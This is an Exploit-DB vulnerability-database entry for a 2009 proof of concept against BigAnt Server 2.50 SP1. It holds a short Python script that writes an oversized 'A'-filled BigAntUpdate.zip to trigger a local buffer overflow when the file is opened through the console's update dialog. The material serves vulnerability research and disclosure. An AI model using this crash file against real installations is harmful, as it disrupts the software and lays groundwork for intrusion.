Lucene search

K
exploitdbDr_IDEEDB-ID:9695
HistorySep 16, 2009 - 12:00 a.m.

BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)

2009-09-1600:00:00
Dr_IDE
www.exploit-db.com
21

AI Score

7.4

Confidence

Low

#!/usr/bin/env python

#######################################################################
#
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:	Open BigAnt Console, Go to Update, Browse to zip, Boom.
#
#######################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-16]

AI Score

7.4

Confidence

Low

Related for EDB-ID:9695